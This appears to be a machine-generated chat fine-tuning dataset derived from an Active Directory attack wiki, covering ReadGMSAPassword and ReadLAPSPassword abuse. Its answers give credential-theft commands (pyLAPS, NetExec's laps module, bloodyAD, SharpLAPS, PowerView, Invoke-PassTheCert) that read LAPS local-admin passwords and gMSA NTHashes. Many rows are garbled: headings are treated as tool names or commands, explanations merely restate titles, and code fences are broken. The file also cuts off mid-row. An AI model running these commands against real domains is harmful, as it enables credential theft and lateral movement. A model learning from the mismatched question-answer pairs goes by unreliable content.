[certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use The for alterantive: build a credential-object with the plain password?", "response": "The third one relies on the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 450, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Alterantive: build a Credential-Object with the Plain Password during a pentest?"}, {"role": "assistant", "content": "The third one relies on the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Alterantive: build a Credential-Object with the Plain Password during a pentest?", "response": "The third one relies on the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 450, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The third one relies on the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell).`?"}, {"role": "assistant", "content": "This command is used for alterantive: build a credential-object with the plain password. Alterantive: build a Credential-Object with the Plain Password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The third one relies on the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell).`?", "response": "This command is used for alterantive: build a credential-object with the plain password. Alterantive: build a Credential-Object with the Plain Password", "metadata": {"corpus_index": 450, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Read the ManagedPassword-related attributes (NTHash included) of the 'gmsad$' Group Managed Service Account (not specifying -Object allows to retrieve every gMSAs' NTHashes the certificate account has access to). work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'gMSA' -Object 'CN=gmsad,CN=Managed Service Accounts,DC=X'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Read the ManagedPassword-related attributes (NTHash included) of the 'gmsad$' Group Managed Service Account (not specifying -Object allows to retrieve every gMSAs' NTHashes the certificate account has access to). work?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'gMSA' -Object 'CN=gmsad,CN=Managed Service Accounts,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 451, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Read the ManagedPassword-related attributes (NTHash included) of the 'gmsad$' Group Managed Service Account (not specifying -Object allows to retrieve every gMSAs' NTHashes the certificate account has access to)."}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'gMSA' -Object 'CN=gmsad,CN=Managed Service Accounts,DC=X'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Read the ManagedPassword-related attributes (NTHash included) of the 'gmsad$' Group Managed Service Account (not specifying -Object allows to retrieve every gMSAs' NTHashes the certificate account has access to).", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'gMSA' -Object 'CN=gmsad,CN=Managed Service Accounts,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 451, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does ReadLAPSPassword work?"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.\n\n``bash\npyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"\n`\n\nAlternatively, NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does ReadLAPSPassword work?", "response": "This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.\n\n``bash\npyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"\n`\n\nAlternatively, NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.\n\n``bash", "metadata": {"corpus_index": 452, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ReadLAPSPassword"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.\n\n``bash\npyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"\n`\n\nAlternatively, NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ReadLAPSPassword", "response": "This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.\n\n``bash\npyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"\n`\n\nAlternatively, NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.\n\n``bash", "metadata": {"corpus_index": 452, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use pyLAPS.py for readlapspassword?"}, {"role": "assistant", "content": "pyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use pyLAPS.py for readlapspassword?", "response": "pyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"", "metadata": {"corpus_index": 453, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "pyLAPS.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for ReadLAPSPassword?"}, {"role": "assistant", "content": "pyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for ReadLAPSPassword?", "response": "pyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"", "metadata": {"corpus_index": 453, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `pyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"`?"}, {"role": "assistant", "content": "This command is used for readlapspassword. ReadLAPSPassword"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `pyLAPS.py --action get -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --dc-ip \"$DC_IP\"`?", "response": "This command is used for readlapspassword. ReadLAPSPassword", "metadata": {"corpus_index": 453, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Default command work?"}, {"role": "assistant", "content": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Default command work?", "response": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps", "metadata": {"corpus_index": 454, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Default command"}, {"role": "assistant", "content": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Default command", "response": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps", "metadata": {"corpus_index": 454, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: ) in the context of penetration testing"}, {"role": "assistant", "content": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps -O computer=\"target-*\"\n``\n\nImpacket's ntlmrelayx also carries that feature, usable with the --dump-laps.\n\nLAPSDumper is another Python alternative.\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime\n`\n\n=== Windows\n\nThis can be achieved with the Active Directory PowerShell module.\n\n`bash\nGet-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nThe PowerView powershell module from PowerSploit can also be used for that purpose.\n\n`powershell\nGet-DomainComputer \"MachineName\" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nSharpLAPS (C#) automates that process. \n\n`bash\nSharpLAPS.exe /user:\"DOMAIN\\User\" /pass:\"Password\" /host:\"192.168.1.1\"\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: ) in the context of penetration testing", "response": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps -O computer=\"target-*\"\n``\n\nImpacket's ntlmrelayx also carries that feature, usable with the --dump-laps.\n\nLAPSDumper is another Python alternative.\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime\n`\n\n=== Windows\n\nThis can be achieved with the Active Directory PowerShell module.\n\n`bash\nGet-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nThe PowerView powershell module from PowerSploit can also be used for that purpose.\n\n`powershell\nGet-DomainComputer \"MachineName\" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nSharpLAPS (C#) automates that process. \n\n`bash\nSharpLAPS.exe /user:\"DOMAIN\\User\" /pass:\"Password\" /host:\"192.168.1.1\"\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 455, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: ) during a pentest?"}, {"role": "assistant", "content": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps -O computer=\"target-*\"\n``\n\nImpacket's ntlmrelayx also carries that feature, usable with the --dump-laps.\n\nLAPSDumper is another Python alternative.\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime\n`\n\n=== Windows\n\nThis can be achieved with the Active Directory PowerShell module.\n\n`bash\nGet-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nThe PowerView powershell module from PowerSploit can also be used for that purpose.\n\n`powershell\nGet-DomainComputer \"MachineName\" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nSharpLAPS (C#) automates that process. \n\n`bash\nSharpLAPS.exe /user:\"DOMAIN\\User\" /pass:\"Password\" /host:\"192.168.1.1\"\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: ) during a pentest?", "response": "nxc ldap \"$DC_HOST\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --module laps -O computer=\"target-*\"\n``\n\nImpacket's ntlmrelayx also carries that feature, usable with the --dump-laps.\n\nLAPSDumper is another Python alternative.\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime\n`\n\n=== Windows\n\nThis can be achieved with the Active Directory PowerShell module.\n\n`bash\nGet-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nThe PowerView powershell module from PowerSploit can also be used for that purpose.\n\n`powershell\nGet-DomainComputer \"MachineName\" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'\n`\n\nSharpLAPS (C#) automates that process. \n\n`bash\nSharpLAPS.exe /user:\"DOMAIN\\User\" /pass:\"Password\" /host:\"192.168.1.1\"\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 455, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}, {"role": "assistant", "content": "Impacket's ntlmrelayx also carries that feature, usable with the `--dump-laps`.\n\n[LAPSDumper](https://github.com/n00py/LAPSDumper) is another Python alternative.\n\nAlternatively, it can be achieved using [bloodyAD](https://github.com/CravateRouge/bloodyAD)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "response": "Impacket's ntlmrelayx also carries that feature, usable with the `--dump-laps`.\n\n[LAPSDumper](https://github.com/n00py/LAPSDumper) is another Python alternative.\n\nAlternatively, it can be achieved using [bloodyAD](https://github.com/CravateRouge/bloodyAD)", "metadata": {"corpus_index": 456, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Impacket's ntlmrelayx also carries that feature, usable with the `--dump-laps`.`?"}, {"role": "assistant", "content": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Impacket's ntlmrelayx also carries that feature, usable with the `--dump-laps`.`?", "response": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "metadata": {"corpus_index": 456, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}, {"role": "assistant", "content": "=== Windows\n\nThis can be achieved with the Active Directory PowerShell module."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "response": "=== Windows\n\nThis can be achieved with the Active Directory PowerShell module.", "metadata": {"corpus_index": 457, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "metadata": {"corpus_index": 457, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use The for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: )?"}, {"role": "assistant", "content": "The [`PowerView`](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) powershell module from PowerSploit can also be used for that purpose."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use The for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: )?", "response": "The [`PowerView`](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) powershell module from PowerSploit can also be used for that purpose.", "metadata": {"corpus_index": 458, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: ) during a pentest?"}, {"role": "assistant", "content": "The [`PowerView`](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) powershell module from PowerSploit can also be used for that purpose."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: ) during a pentest?", "response": "The [`PowerView`](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) powershell module from PowerSploit can also be used for that purpose.", "metadata": {"corpus_index": 458, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The [`PowerView`](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) powershell module from PowerSploit can also be used for that purpose.`?"}, {"role": "assistant", "content": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The [`PowerView`](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) powershell module from PowerSploit can also be used for that purpose.`?", "response": "This command is used for the computer filter can be the name or wildcard (e.g. win-s10, win- etc. default: ). The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )", "metadata": {"corpus_index": 458, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readlapspassword.md", "page_title": "ReadLAPSPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN- etc. Default: )"}, {"role": "assistant", "content": 